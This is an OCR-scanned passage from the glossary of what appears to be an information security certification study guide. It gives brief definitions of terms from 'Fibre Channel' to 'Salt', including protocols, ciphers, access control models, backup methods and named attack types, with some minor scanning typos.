Fibre Channel Non-Ethernet/IP fiber optic storage technology 
Fibre Channel over Ethernet See — FCoE 
Fibre Channel over IP See — FCIP 

FIdM Federated Identity Management, applies Single Sign On at a much wider scale: ranging 
from cross-organization to Internet scale 

Fiber Distributed Data Interface See — FDDI 

Fiber Optic network cable Uses light to carry information 
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Field of view The entire area viewed by a camera 

File Transfer Protocol See — FTP 

FIN TCP flag, finish a connection (gracefully) 

Fingerprint scan Biometric scan of the minutiae (specific details of the fingerprint) 

Firewall Device that filter traffic based on layers 3 (IP addresses) and 4 (ports) 

Firmware Stores small programs that do not change frequently, such as a computer's BIOS 
First sale doctrine Allows a legitimate purchaser of copyrighted material to sell it to another 
person 

Fitness function Genetic algorithm concept that assigns a score to an evolved algorithm 
Flash memory A specific type of EEPROM, used for small portable disk drives 
Flat file Text file that contains multiple lines of data, each in a standard format 
Footcandle One lumen per square foot 

Foreign key A key in a related database table that matches a primary key in the parent database 
Formal access approval Documented approval from the data owner for a subject to access 
certain objects 

Forward chaining Expert system mode that starts with no premise, and works forward to 
determine a solution 

Fourth-generation programming language See — 4GL 

Fraggle attack Smurf attack variation which uses UDP instead of ICMP 

Frame Layer 2 PDU 

Free software Controversial term that is defined differently by different groups. “Free” may 
mean free of charge, or “free” may mean the user is free to use the software in any way 
they would like, including modifying it 
Freeware Software that is free of charge 

Frequency Hopping Spread Spectrum See — FHSS 

FRR False Reject Rate occurs when an authorized subject is rejected as invalid. Also known 
as a type I error 

FTP File Transfer Protocol, used to transfer files to and from servers 
Full backup An archive of all files 

Full disclosure The controversial practice of releasing vulnerability details publicly 

Full Disk Encryption See — FDE 

Full duplex Two-way simultaneous transmission, like two people having a face-to-face 
conversation 

Full knowledge test A penetration test where the tester is provided with inside information 
at the start of the test 
Fuzz testing See — Fuzzing 

F uzzing A type of black box testing that enters random malformed data as inputs into software 
programs to determine if they will crash 
GAN Global Area Network; a global collection of WANs 

Genetic algorithms Creating computer algorithms via Darwinian evolution principals 
Genetic programming Creating entire software programs (usually in the form of Lisp source 
code) via Darwinian evolution principals 
GFS Grandfather-Father-Son, a backup rotation method 

GIG Global Information Grid, the US DoD global network, one of the largest private 
networks in the world 

GLBA Gramm-Leach-Bliley Act, requires financial institutions to protect the confidentiality 
and integrity of consumer financial information 
Global Area Network See — GAN 
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Global Information Grid See — GIG 

Graham-Denning Model Has three parts objects, subjects and rules. It provides a more 
granular approach for interaction between subjects and objects 
Gramm-Leach-Bliley Act See — GLBA 
Grandfather-Father-Son See — GFS 
Gross negligence The opposite of due care 
Guideline A recommendation, administrative control 

Hacker Controversial term that may mean explorer or someone who maliciously attacks systems 
Hacktivist Hacker activist, someone who attacks computer systems for political reasons 
Half duplex Sends or receives at one time only (not simultaneously), like a walkie-talkie 
Hand geometry Biometric control that uses measurements from within specific points on the 
subject’s hand 

Hardcopy data Any data that is accessed through reading or writing on paper rather than 
processing through a computer system 

Harrison-Ruzzo-Ullman Model Maps subjects, objects, and access rights to an access 
matrix. It is considered a variation to the Graham-Denning Model 
Hash Function One-way encryption using an algorithm and no key 
Hash of Variable Length See — HAVAL 
Hashed Message Authentication Code See — HMAC 

HAVAL Hash of Variable Length, a hash algorithm that creates message digests of 128, 160, 
192, 224, or 256 bits in length, using 3, 4, or 5 rounds 
HDLC High-Level Data Link Control, the successor to SDLC 
HDSL High-data-rate DSL, matches SDSL speeds using two pairs of copper 

Health Insurance Portability and Accountability Act See — HIPAA 
Hearsay Second-hand evidence 

Hebern Machines Class of cryptographic devices known as rotor machines, includes Enigma 
and SIGABA 

HIDS Host-based Intrusion Detection System, a detective technical control 
Hierarchical database Database that forms a tree 

High availability cluster Multiple systems that can be seamlessly leveraged to maintain the 
availability of the service or application being provided. Also called a failover cluster 

High-data-rate DSL See — HDSL 
High-Level Data Link Control See — HDLC 

HIPAA Health Insurance Portability and Accountability Act, United States regulation which 
protects healthcare information 

HIPS Host-based Intrusion Prevention System, preventive device that processes information 
within the host 

HMAC Hashed Message Authentication Code provides integrity by combining symmetric 
encryption with hashing 

Hold-down timer Distance vector routing protocol safeguard that avoids flapping 

Honeynet A network of honeypots 

Honeypot A system designed to attract attackers 

Host-based Intrusion Detection Systems See — HIDS 
Host-based Intrusion Prevention System See — HIPS 
Host-to-host layer See — Transport layer (TCP/IP) 

Host-to-host transport layer See — Transport layer (TCP/IP) 

Hot site A backup site with all necessary hardware and critical applications data mirrored in 
real time 
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HTML Hypertext Markup Language, used to display web content 
HTTP Hypertext Transfer Protocol, a protocol to transmit web data via a network 
HTTPS Hypertext Transfer Protocol Secure, HTTP using SSL or TLS 
Hub Layer 1 network access device that acts as a multiport repeater 

Hybrid attack Password attack that appends, prepends or changes characters in words from 
a dictionary 

Hybrid risk analysis Combines quantitative and qualitative risk analysis 

Hypertext Markup Language See — HTML 
Hypertext Transfer Protocol See — HTTP 
Hypertext Transfer Protocol Secure See — HTTPS 

Hypervisor Software or operating system that controls access between virtual guests and 
host hardware 

Hypervisor mode Allows guests to operate in ring 0, controlled by a hypervisor in ring “-1” 
I/O Controller Hub See — Southbridge 

IaaS Infrastructure as a Service, provides an entire virtualized operating system, which the 
customer configures from the OS on up 
ICC See — Smartcard 
ICH See — Southbridge 
ICMP Internet Control Message Protocol, 

IDaaS Identity as a Service, also called cloud identity, allows organizations to leverage cloud 
service for identity management 

IDEA International Data Encryption Algorithm, a symmetric block cipher using a 128-bit key 
and 64-bit block size 

Identification Association of an individual 

Identify preventive controls Third step of the NIST SP 800-34 contingency planning process 
Identity as a Service See — IDaaS 

IDL Interface Definition Language, used by CORBA objects to communicate 
IDS Intrusion Detection System, a detective technical control 
IGP Interior Gateway Protocol 

IKE Internet Key Exchange, manages the IPsec encryption algorithm 
IMAP Internet Message Access Protocol, an email client protocol 
Impact The severity of damage, sometimes expressed in dollars (value) 

Incremental backup An archive of all files that have changed since the last backup of any 
kind was performed 

Individual Participation Principle OECD Privacy Guideline principle that states individu- 
als should have control over their data 

Industrial, Scientific and Medical See — ISM 

Inference Deductive attack where a user is able to use lower-level access to learn restricted 
information 

Inference engine Expert system component that follows the tree formed by knowledge base, 
and fires a rule when there is a match 

Information Technology Infrastructure Library See — ITIL 
Information Technology Security Evaluation Criteria See — ITSEC 
Infrastructure as a Service See — IaaS 
Inheritance Objects inherit capabilities from their parent class 
Initial CMM phase 1 

Installation Testing Testing software as it is installed and first operated 
Instance One copy of an object 
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Integrated Circuit Card See — Smartcard 
Integrated Product Team See — IPT 
Integrated Services Digital Network See — ISDN 

Integration Testing Testing multiple software components as they are combined into a work- 
ing system 

Integrity Seeks to prevent unauthorized modification of information 
Intellectual property Intangible property that resulted from a creative act 

Interface Definition Language See — IDL 

Interface testing Tests all the ways users can interact with the application, and is concerned 
with appropriate functionality being exposed. From a security-oriented vantage point, the 
goal is to ensure that security is uniformly applied across the various interfaces 

Interior Gateway Protocol See — IGP 
International Data Encryption Algorithm See — IDEA 
Internet A global collection of peered networks running TCP/IP 
Internet Control Message Protocol See — ICMP 
Internet Key Exchange See — IKE 

Internet layer TCP/IP model layer that aligns with the Layer 3 of the OSI model, describes 
IP addresses and routing 

Internet Message Access Protocol See — IMAP 
Internet of Things See — IOT 
Internet Protocol See — IP 
Internet Protocol Security See — IPsec 
Internet Relay Chat See — IRC 

Internet Security Association and Key Management Protocol See — ISAKMP 

Internet Small Computer System Interface See — iSCSI 

Interpreted code Code that is compiled on the fly each time the program is run 

Interrupt Indicates an asynchronous CPU event has occurred 

Intranet A privately owned network running TCP/IP 

Intrusion Detection System See — IDS 

Intrusion Prevention System See — IPS 

IOT Internet of Things, Internet-connected embedded devices such as thermostats, baby 
monitors, appliances, light bulbs, smart meters, etc 
IP Internet protocol, includes IPv4 and IPv6 

IPS Intrusion Prevention System, a preventive device designed to prevent malicious actions 
IPsec Internet Protocol Security, a suite of protocols that provide a cryptographic layer to 
both IPv4 and IPv6 

IPT Integrated Product Team, a customer-focused group that focuses on the entire lifecycle 
of a project 

IPv4 Internet Protocol version 4, commonly called IP. It is the fundamental protocol of the 
Internet 

IPv6 Internet Protocol version 6, the successor to IPv4, featuring far larger address space, 
simpler routing, and simpler address assignment 
IPv6 autoconfiguration Autoconfiguration of a unique IPv6 address, omitting the need for 
static addressing or DHCP 

IRC Internet Relay Chat, a global network of chat servers and clients 
Iris scan Passive biometric scan of the iris (colored portion of the eye) 

ISAKMP Internet Security Association and Key Management Protocol, manages the IPsec 
Security Association process 
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iSCSI Internet Small Computer System Interface, Storage Area Network (SAN) protocol 
transmitted via Ethernet and TCP/IP 

ISDN Integrated Services Digital Network, provides digital service via copper pair 
ISM Industrial, Scientific, and Medical, wireless bands set aside for unlicensed use 
ISO 17799 A broad-based approach for information security code of practice by the 
International Organization for Standardization 

ISO 22301 Management-focused business continuity guideline called “Business continuity 
management systems - Requirements” 

ISO/IEC-27031 Technically-focused business continuity guideline that is part of the ISO 
27000 series 

ITIL Information Technology Infrastructure Library, is a framework for providing best ser- 
vices in IT Service Management 

ITSEC Information Technology Security Evaluation Criteria, the first successful interna- 
tional evaluation model 

Java An object-oriented language used not only to write applets, but also as a general-purpose 
programming language 

JavaScript Object Notation See — JSON 

Jefferson Disks Cryptographic device invented by Thomas Jefferson that used multiple 
wheels, each with an entire alphabet along the ridge 
JSON JavaScript Object Notation, a data interchange format 
KDC Key Distribution Center, a Kerberos service that authenticates principals 
Kerberos A third-party authentication service that may be used to support Single Sign On 
Kernel The heart of the operating system, that usually runs in ring 0. It provides the interface 
between hardware and the rest of the operating system, including applications 
Key Distribution Center See — KDC 

Key lock Preventive device that requires a physical key to unlock 

Keyboard dynamics Biometric control that refers to how hard a person presses each key and 
the rhythm by which the keys are pressed 
Keyboard unit The external keyboard 

Knowledge base Expert system component that consists of “if/then” statements 
L2F Layer 2 Forwarding, designed to tunnel PPP 
L2TP Layer 2 Tunneling Protocol, combines PPTP and L2F 
Label Security level assigned to an object, such as confidential, secret or top secret 
LAN Local Area Network, a comparatively small network, typically confined to a building 
or an area within one 

LAND attack DoS attack which uses a spoofed SYN packet that includes the victim's IP 
address as both source and destination 

Lattice-Based Access Controls Nondiscretionary access control with defined upper and 
lower bounds implemented by the system 

Layer 2 Tunneling Protocol See — L2TP 
Layered defense See — Defense-in-depth 

Layering Separates hardware and software functionality into modular tiers 
LCP Link Control Protocol, the initial unauthenticated connected used by CHAP 
LDAP Lightweight Directory Access Protocol, open protocol for interfacing and querying 
directory service information provided by network operating systems. Uses port 389 via 
TCP or UDP 

LEAP Lightweight Extensible Authentication Protocol, a Cisco-proprietary protocol released 
before 802. IX was finalized 


540 Glossary 


Least privilege See — Principle of least privilege 
Legal liability Liability enforced through civil law 
Lightweight Directory Access Protocol See — LDAP 
Lightweight Extensible Authentication Protocol See — LEAP 

Linear cryptanalysis Known plaintext attack where the cryptanalyst finds large amounts of 
plaintext/ciphertext pairs created with the same key 

Link Control Protocol See — LCP 

Link state Routing protocols that factor in additional metrics for determining the best route, 
including bandwidth 

Live forensics Taking a binary image of physical memory, gathering details about running 
processes, and gathering network connection data 
LLC Logical Link Control, layer 2 protocol that handles LAN communications 
Local Area Network See — LAN 

Lock bumping Attack on locks using a shaved key, which bumps the pins, allowing the lock 
to turn 

Lock picking The art of unlocking a lock without a key 

Logic bomb A malicious program that is triggered when a logical condition is met, such as 
after a number of transactions have been processes, or on a specific date 
Logical Link Control See — LLC 
Logical Unit Numbers See — LUN 
Lumen The amount of light one candle creates 

LUN Logical Unit Numbers, provide a way of addressing storage across the network. Also 
used for basic access control for network accessible storage 
Lux One lumen per square meter 
LWP See— Thread 

MAC (Access Control) Mandatory Access Control, system-enforced access control based on 
subject’s clearances and object’s labels 

MAC (Telecommunications) Media Access Control, layer 2 protocol that transfers data to 
and from the physical layer 
MAC address Layer 2 address of a NIC 
Machine code Software that is executed directly by the CPU 
MAD See— MTD 

Magnetic stripe card Passive device that contains no circuits. Sometimes called swipe cards: 

they are used by swiping through a card reader 
Maintenance hook Shortcut installed by system designers and programmers to allow 
developers to bypass normal system checks during development 
Malicious Code See — Malware 

Malware Malicious software, any type of software which attacks an application or system 
MAN Metropolitan Area Network, typically confined to a city, a zip code, or a campus or 
office park 

Managed CMM phase 4 

Managed mode 802.1 1 mode that clients use to connect to an AP 
Mandatory Access Control See — MAC 

Mandatory leave Forcing staff to take vacation or time away from the office. Also known as 
forced vacation 

Mantrap A preventive physical control with two doors. Each door requires a separate form 
of authentication to open 
Master mode 802.1 1 mode used by APs 
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Maximum Allowable Downtime See — MTD 
Maximum Tolerable Downtime See — MTD 
Maximum Transmission Unit See — MTU 

MCH See — Northbridge 

MD5 Message Digest 5, a hash function that creates a 128-bit message digest 

Mean Time Between Failures See — MTBF 
Mean Time to Repair See — MTTR 
Media Access Control See — MAC 
Memory Volatile or nonvolatile computer storage 
Memory Controller Hub See — Northbridge 

Mesh Physical network topology that interconnects network nodes to each other 

Message Digest 5 See — MD5 

Message Integrity Check See — MIC 

Method The function performed by an object 

Metropolitan Area Network See — MAN 

MIC Message Integrity Check, integrity protocol used by WPA2 

Microkernels A modular kernel 

Microwave motion detector Active motion detector that uses microwave energy 
Middleware Connects programs to programs 

Minimum Operating Requirements See — MOR 

Minutiae Specific fingerprint details that include whorls, ridges, bifurcation, and others 
Mirroring Complete duplication of data to another disk, used by some levels of RAID 
Mission Owners See — Business Owners 

Mobile sites DRP backup site option that is a “data centers on wheels”; towable trailers that 
contain racks of computer equipment, as well as HVAC, fire suppression and physical security 
Modem Modulator/Demodulator; takes binary data and modulates it into analog sound that 
can be carried on phone networks 

Modes of Operation Dedicated, system-high, compartmented, and multilevel modes 
Monitor mode 802. 1 1 read-only mode used for sniffing 
Monoalphabetic cipher Substitution cipher using one alphabet 
Monolithic kernel A statically compiled kernel 

MOR Minimum Operating Requirements, describes the minimum environmental and con- 
nectivity requirements in order to operate computer equipment 
Motherboard Contains computer hardware including the CPU, memory slots, firmware, and 
peripheral slots such as PCI (Peripheral Component Interconnect) slots 
MPUS Multiprotocol Label Switching, provides a way to forward WAN data via labels 
MTBF Mean Time Between Failures, quantifies how long a new or repaired system will run 
on average before failing 

MTD Maximum Tolerable Downtime, the total time a system can be inoperable before an 
organization is severely impacted 

MTTR Mean Time to Repair, describes how long it will take to recover a failed system 
MTU Maximum Transmission Unit, the maximum PDU size on a network 
Multicast One-to-many network traffic, and the “many” is preselected 
Multipartite virus Virus that spreads via multiple vectors. Also called multipart virus 
Multiprocessing Runs multiple processes on multiple CPUs 
Multiprotocol Label Switching See — MPLS 

Multitasking Allows multiple tasks (heavy weight processes) to run simultaneously on one 
CPU 
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Mutation Genetic algorithm concept that introduces random changes to algorithms 
Mutual Aid Agreement See — Reciprocal agreement 
NAT Network Address Translation, translates IP addresses 

NDA Nondisclosure agreement, a contractual agreement that ensures that an individual or 
organization appreciates their legal responsibility to maintain the confidentiality of sensi- 
tive information 

Need to know Requirement that subjects need to know information before accessing it 
Network access layer TCP/IP model layer that combines layers 1 and 2 of the OSI model. It 
describes Layer 1 issues such as energy, bits, and the medium used to carry them 
Network Address Translation See — NAT 
Network Interface Card See — NIC 
Network Intrusion Prevention System See — NIPS 

Network layer Layer 3 of the OSI model, describes routing data from a system on one LAN 
to a system on another 

Network model (databases) Type of hierarchical database that allows branches to have two 
parents 

Network model (telecommunications) A description of how a network protocol suite operates 
Network stack A network protocol suite programmed in software or hardware 
Network-based Intrusion Detection System See — NIDS 
NIC Network Interface Card, a card that connects a system to a network 
NIDS Network-based Intrusion Detection System, a detective technical control 
NIPS Network Intrusion Prevention System, a preventive device designed to prevent mali- 
cious network traffic 

NIST SP 800-34 NIST Special Publication 800-34 “Contingency Planning Guide for 
Information Technology Systems” 

Nonce Sum See — NS 
Nondisclosure agreement See — NDA 

Nondiscretionary access control Access control based on subjects’ roles or tasks 
Noninterference Model Ensures that data at different security domains remain separate from 
one another 

Non-repudiation Assurance that a specific user performed a specific transaction and assur- 
ance that the transaction did not change 
Normal Response Mode See — NRM 

Normalization Seeks to make the data in a database table logically concise, organized and 
consistent 

Northbridge Connects the CPU to RAM and video memory, also called the Memory 
Controller Hub (MCH) 

NRM Normal response mode, SDLC/HDLC mode where secondary nodes can transmit 
when given permission by the primary 
NS Nonce Sum, the newest TCP flag, used for congestion notification 
Object A data file 

Object A “black box” that combines code and data, and sends and receives messages 
Object encapsulation Treats a process as a “black box” 

Object Linking and Embedding See — OLE 
Object Request Brokers See — ORBs 
Object-Oriented Analysis See — OOA 

Object-oriented database Database that combines data with functions (code) in an object- 
oriented framework 
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Object-Oriented Design See — OOD 
Object-Oriented Programming See — OOP 
Occupant Emergency Plan See — OEP 

OCSP Online Certificate Status Protocol, a client-server method for looking up revoked 
certificates 

OCTAVE Operationally Critical Threat, Asset, and Vulnerability Evaluation, a risk manage- 
ment framework from Carnegie Mellon University 
OECD Privacy Guidelines Organization for Economic Cooperation and Development 
privacy guidelines, containing eight principles 
OEP Occupant Emergency Plan, a facility-based plan focused on safety and evacuation 
OFB Output Feedback, a stream mode of DES that uses portions of the key for feedback 
OFDM Orthogonal Frequency-Division Multiplexing, a newer wireless multiplexing method, 
allowing simultaneous transmission using multiple independent wireless frequencies that 
do not interfere with each other 
Offshoring Outsourcing to another country 

OLE Object Linking and Embedding, part of DCOM which links documents to other docu- 
ments 

One-Time Pad Theoretically unbreakable encryption using paired pads of random characters 
One-time password Password that may be used for a single authentication 

Online Certificate Status Protocol See — OCSP 

OOA Object-Oriented Analysis, high-level approach to understanding a problem domain that 
and identifies all objects and their interaction 

OOD Object-Oriented Design, a high-level object-oriented approach to designing software 
OOP Object-Oriented Programming, changes the older procedural programming meth- 
odology, and treats a program as a series of connected objects that communicate via 
messages 

Open Shortest Path First See — OSPF 

Open source Software with publicly published source code, allowing anyone to inspect, 
modify, or compile the code 

Open system System using open hardware and standards, using standard components from 
a variety of vendors 

Openness Principle OECD Privacy Guideline principle that states collection and use of per- 
sonal data should be readily available 
Operating system Software that operates a computer 

Operationally Critical Threat, Asset, and Vulnerability Evaluation See — OCTAVE 
Optimizing CMM phase 5 
Orange Book See— TCSEC 

ORBs Object Request Brokers, used to locate and communicate with objects 

Organizationally Unique Identifier See — OUI 
Orthogonal Frequency-Division Multiplexing See — OFDM 

OSI model A network model with seven layers: physical, data link, network, transport, 
session, presentation, and application 
OSPF Open Shortest Path First, an open link state routing protocol 
OUI Organizationally Unique Identifier, the first 24 bits of a MAC address 

Output Feedback See — OFB 

Outsourcing Use of a third party to provide Information Technology support services which 
were previously performed in-house 

Overt channel Authorized communication that complies with security policy 
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PaaS Platform as a Service, provides a pre-configured operating system, and the customer 
configures the applications 
Packet Layer 3 PDU 

Packet Alter A simple and fast firewall that has no concept of state 

Packet-switched network A form of networking where bandwidth is shared and data is car- 
ried in units called packets 

Pairwise testing Form of combinatorial software testing that tests unique pairs of inputs 
PAN Personal Area Network, a very small network with a range of 100 m or much less 
Panic bar Egress device that opens externally facing doors from the inside 
PAP Password Authentication Protocol, an insecure network authentication protocol that 
exposes passwords in cleartext 

Parallel processing Recovery of critical processing components at an alternate computing 
facility, without impacting regular production systems 
Parent class OOP concept that allows objects to inherit capabilities from parents 
Parity A means to achieve data redundancy without incurring the same degree of cost as that 
of mirroring in terms of disk usage and write performance 
Partial knowledge test A penetration test where the tester is provided with partial inside 
information at the start of the test 

Passive infrared sensor Passive motion detector that detects infrared energy created by body 
heat 

Passive RFID Unpowered RFID tags 

Passphrase A long static password, comprised of words in a phrase or sentence 

Password Authentication Protocol See — PAP 

Password cracking An offline technique in which the attacker has gained access to the pass- 
word hashes or database 

Password guessing An online technique that involves attempting to authenticate as a particu- 
lar user to the system 

Patch management The process of managing software updates 

Patent Intellectual property protection that grants a monopoly on the right to use, make, or 
sell an invention for a period of time 

Payment Card Industry Data Security Standard See — PCI-DSS 

PCI-DSS Payment Card Industry Data Security Standard, a security standard created by the 
Payment Card Industry Security Standards Council (PCI SSC) 

PDA Personal Data Assistant, a small networked computer that can fit in the palm of your 
hand 

PDU Protocol Data Unit, a header and data at one layer of a network stack 
PEAP Protected EAR similar to EAP-TTLS, including not requiring client-side certificates 
Penetration test Security test designed to determine if an attacker can penetrate an 
organization 

Permutation (Also called transposition) provides confusion by rearranging the characters of 
the plaintext, anagram-style 
Personal Area Network See — PAN 
Personal Digital Assistant See — PDA 
Personal Identification Number See — PIN 
Personally Identifiable Information See — PII 

PGP Pretty Good Privacy, software that integrates asymmetric, symmetric and hash cryptography 
Phishing Malicious attack that poses as a legitimate site such as a bank, attempting to steal 
account credentials 
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Photoelectric motion sensor Active motion detector that sends a beam of light across a mon- 
itored space to a photoelectric sensor 

Physical controls Implemented with physical devices, such as locks, fences, gates, etc 
Physical layer Layer 1 of the OSI model, describes units of data like bits represented by 
energy, and the medium used to carry them 

PII Personally Identifiable Information, data associated with a specific person, such as credit 
card data 

PIN Personal Identification Number, a number-based password 
Ping Sends an ICMP Echo Request to a node and listens for an ICMP Echo Reply 
Ping of death DoS that sends a malformed ICMP Echo Request (Ping) that is larger than the 
maximum size of an IP packet 

Pipelining CPU feature that combines multiple steps into one combined process, allowing 
simultaneous fetch, decode, execute and write steps for different instructions 
PKI Public Key Infrastructure leverages symmetric, asymmetric and hash-based cryptogra- 
phy to manage digital certificates 
Plaintext An unencrypted message 

Plan maintenance Seventh step of the NIST SP 800-34 contingency planning process 
Plan testing, training, and exercises Sixth step of the NIST SP 800-34 contingency planning 
process 

Platform as a Service See — PaaS 

PLD Programmable Logic Device, field-programmable hardware 

Point-to-Point Protocol See — PPP 
Point-to-Point Tunneling Protocol See — PPTP 

Poison reverse Distance vector routing protocol safeguard that sets bad route to infinity 
Policy High-level management directives, administrative control 
Polyalphabetic cipher Substitution cipher using multiple alphabets 

Polyinstantiation Allows two different objects to have the same name. The name is based on 
the Latin roots for multiple (poly) and instances (instantiation) 

Polymorphic virus Virus that changes its signature upon infection of a new system, attempt- 
ing to evade signature-based antivirus software 
Polymorphism OOP concept based on the Greek roots “poly” and “morph," meaning many 
and forms, respectively): allows an object to overload an operator, for example 
POP Post Office Protocol, an email client protocol 

POST Power-On Self-Test, performs basic computer hardware tests, including verifying the 
integrity of the BIOS, testing the memory, identifying system devices, among other tasks 

Post Office Protocol See — POP 

POTS Plain Old Telephone Service, analog phone service 
Power-On Self-Test See— POST 

PPP Point-to-Point Protocol, a Layer 2 protocol that has largely replaced SLIP, adding confi- 
dentiality, integrity and authentication 
PPTP Point-to-Point Tunneling Protocol, tunnels PPP via IP 

Presentation layer Layer 6 of the OSI model, presents data to the application in a compre- 
hensible way 

Pretty Good Privacy See — PGP 

Preventive controls Prevents actions from occurring 

PRI Primary Rate Interface, provides 23 64K digital ISDN channels 

Primary key Unique attribute in a relational database table, used to join tables 

Primary Rate Interface See — PRI 
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Principal Kerberos client (user) or service 

Principle of least privilege Granting subjects the minimum amount of authorization required 
to do their jobs, also known as minimum necessary access 
Privacy Protection of the confidentiality of personal information 

Privacy Act of 1974 Protects US citizens’ data that is being used by the federal government 
Private key One half of asymmetric key pair, must be kept secure 
Problem domain A specific challenge that needs to be addressed 

Procedural languages Programming languages that use subroutines, procedures and func- 
tions 

Procedure Step-by-step guide for accomplishing a task, administrative control 
Process An executable program and its associated data loaded and running in memory 
Process isolation Logical control that attempts to prevent one process from interfering with 
another 

Product Owner Scrum role that serves as the voice of the business unit 

Programmable Logic Device See — PLD 
Programmable Read Only Memory See — PROM 

PROM Programmable Read Only Memory, memory that can be written to once, typically at 
the factory 

Promiscuous access The ability to sniff all traffic on a network 

Protect society, the commonwealth, and the infrastructure First canon of the (ISC) 2 ® Code 
of Ethics 

Protected EAP See — PEAP 
Protocol Data Unit See — PDU 

Provide diligent and competent service to principals Third canon of the (ISC) 2 ® Code of 
Ethics 

Proxy firewall Firewalls that terminate connections and act as intermediary servers 
Prudent Man Rule Organizations should engage in business practices that a prudent, right 
thinking, person would consider to be appropriate 
Pseudo guard An unarmed security guard 
PSH TCP flag, push data to application layer 

Public key One half of asymmetric key pair, may be publicly posted 

Public Key Infrastructure See — PKI 

Punitive damages Damages designed to punish an individual or organization 
Purple Allied name for the stepping-switch encryption device used by Japanese Axis powers 
during World War II 

Purpose Specification Principle OECD Privacy Guideline principle that states the purpose 
for the data collection should be known, and the subsequent use of the data should be lim- 
ited to the purposes outlined at the time of collection 
PVC Permanent Virtual Circuit, a circuit that is always connected 

QoS Quality of Service, gives specific traffic precedence over other traffic on packet-switched 
networks 

Qualitative Risk Analysis RA method which uses approximate values 
Quality of Service See — QoS 

Quantitative Risk Analysis RA method that uses hard metrics such as dollars 
Query language Language that searches and updates a database 
Race condition See — TOCTOU 

RAD Rapid Application Development, rapidly develops software via the use of prototypes, 
“dummy” GUIs, back-end databases, and more 
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Radio-Frequency Identification See — RFID 

RADIUS Remote Authentication Dial in User Service, a UDP-based third-party authentica- 
tion system 

RAID Redundant Array of Inexpensive Disks, a method of using multiple disk drives to 
achieve greater data reliability, greater speed, or both 
RAID 0 RAID striped set 
RAID 1 RAID mirrored set 

RAID 1 + 0 RAID 0 combined with RAID 1, sometimes called RAID 10 
RAID 10 See— RAID 1 + 0 
RAID 2 RAID Hamming code 

RAID 3 RAID striped set with dedicated parity (byte level) 

RAID 4 RAID Striped set with dedicated parity (block level) 

RAID 5 RAID striped set with distributed parity 
RAID 6 RAID striped set with dual distributed parity 

Rainbow Table Acts as database that contains the hashed output for most or all possible 
passwords 

RAM Random Access Memory, memory that allows any address to be directly accessed 

Random Access Memory See — RAM 
Rapid Application Development See — RAD 

RAT Remote Access Trojans, Trojan Horses which may be remotely controlled 
RBAC Role-Based Access Controls, subjects are grouped into roles and each defined role has 
access permissions based upon the role, not the individual 
RC4 Rivest Cipher 4, used to provide confidentiality by WPA 
RC5 Rivest Cipher 5, Symmetric block cipher by RSA Laboratories 
RC6 Rivest Cipher 6, Symmetric block cipher by RSA Laboratories, AES finalist 
Read Only Memory See — ROM 

Real evidence Evidence consisting of tangible or physical objects 
Realm A logical Kerberos network 

Real-time Transport Protocol See — RTP 

Reciprocal agreement A bi-directional agreement between two organizations in which one 
organization promises another organization it can move in and share space if it experi- 
ences a disaster. Also known as mutual aid agreement 
Recovery controls Controls that restore a damaged system or process 

Recovery phase Incident response phase that restores a previously compromised system to 
operational status 

Recovery Point Objective See — RPO 
Recovery Time Objective See — RTO 
Reduced Instruction Set Computer See — RISC 
Reduction analysis The process of analyzing and lowering risk 
Redundant Array of Inexpensive Disks See — RAID 

Redundant site An exact production duplicate of a system that has the capability to seam- 
lessly operate all necessary IT operations without loss of services to the end user 
Reference monitor Mediates all access between subjects and objects 

Referential integrity Requires that every foreign key in a secondary table matches a primary 
key in the parent table 

Registers Small storage locations used by the CPU to store instructions and data 
Regression Testing Testing software after updates, modifications or patches 
Regulatory law See — Administrative law 
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Relational database Contains two-dimensional tables of related data 

Religious law Legal system that uses religious doctrine or interpretation as a source of legal 
understanding and statutes 

Remanence Data that might persist after removal attempts 
Remote Access Trojans See — RAT 

Remote Authentication Dial In User Service See — RADIUS 
Remote File Inclusion See — RFI 

Remote journaling Saves database checkpoints and the database journal to a remote site. In 
the event of failure at the primary site, the database may be recovered 
Remote meeting technology Newer technology that allows users to conduct online meetings 
via the Internet, including desktop sharing functionality 
Remote wipe The ability to remotely erase a mobile device 
Repeatable CMM phase 2 

Repeater Layer 1 device that receives bits on one port, and “repeats” them out the other port 
Reporting phase Incident response phase that provides a final report on the incident 
Representational State Transfer See — REST 
Reserved ports TCP/IP ports 1023 and lower 

Responsible disclosure The practice of privately sharing vulnerability information with a 
vendor, and withholding public release until a patch is available 
REST Representational State Transfer, used to implement web services 
Retina scan Biometric laser scan of the capillaries which feed the retina 
Return on Investment Money saved by deploying a safeguard 
RFC 1918 addresses Private IPv4 addresses which may be used for internal traffic 
RFI Remote File Inclusion, altering web URLs to include remote content 
RFID Radio-Frequency Identification, a type of contact less card technology 
Rijndael Cipher which became AES, named after authors Vincent Rijmen and Joan Daemen 
Ring (physical) Physical network topology that connects nodes in a physical ring 
Ring model Form of CPU hardware layering that separates and protects domains (such as 
kernel mode and user mode) from each other 

RIP Routing Information Protocol, a distance vector routing protocol that uses hop count as 
its metric 

RISC Reduced Instruction Set Computer, CPU instructions which are short and simple 
Risk A matched threat and vulnerability 

Risk Analysis Matrix A quadrant used to map the likelihood of a risk occurring against the 
consequences (or impact) that risk would have 
Robust Security Network See — RSN 
Role-Based Access Controls See — RBAC 
Rollback Restores a database after a failed commit 
ROM Read Only Memory 

Rootkit Malware that replaces portions of the kernel and/or operating system 
Rotation Cipher Substitution cipher that shifts each character of ciphertext a fixed amount 
past each plaintext character 

Rotation of duties Requires that critical functions or responsibilities are not continuously 
performed by the same person without interruption. Also known as job rotation 
Router Layer 3 device that routes traffic from one LAN to another, based on IP addresses 

Routing Information Protocol See — RIP 

RPO Recovery Point Objective, the amount of data loss or system inaccessibility (measured 
in time) that an organization can withstand 


Glossary 549 


RSN Robust Security Network, part of 802.1 li that allows changes to cryptographic ciphers 
as new vulnerabilities are discovered 
RST TCP flag, reset (tear down) a connection 

RTO Recovery Time Objective, the maximum time allowed to recover business or IT systems 
RTP Real-time Transport Protocol, VoIP protocol designed to carry streaming audio and video 
Rule-based access control Uses a series of defined rules, restrictions, and filters for access- 
ing objects within a system 

Running-key cipher Cryptographic method that uses whole words from a well-known text 
such as a dictionary, “adding” letters to plaintext using modular math 
S/MIME Secure/Multipurpose Internet Mail Extensions, leverages PKI to encrypt and 
authenticate MIME-encoded email 

SA Security Association, a simplex connection which may be used to negotiate ESP or AH 
parameters 

SaaS Software as a Service, completely configured cloud-based application, from the operat- 
ing system on up 

Salt A random number that is hashed with a password. Allows one password to hash multiple 
ways 

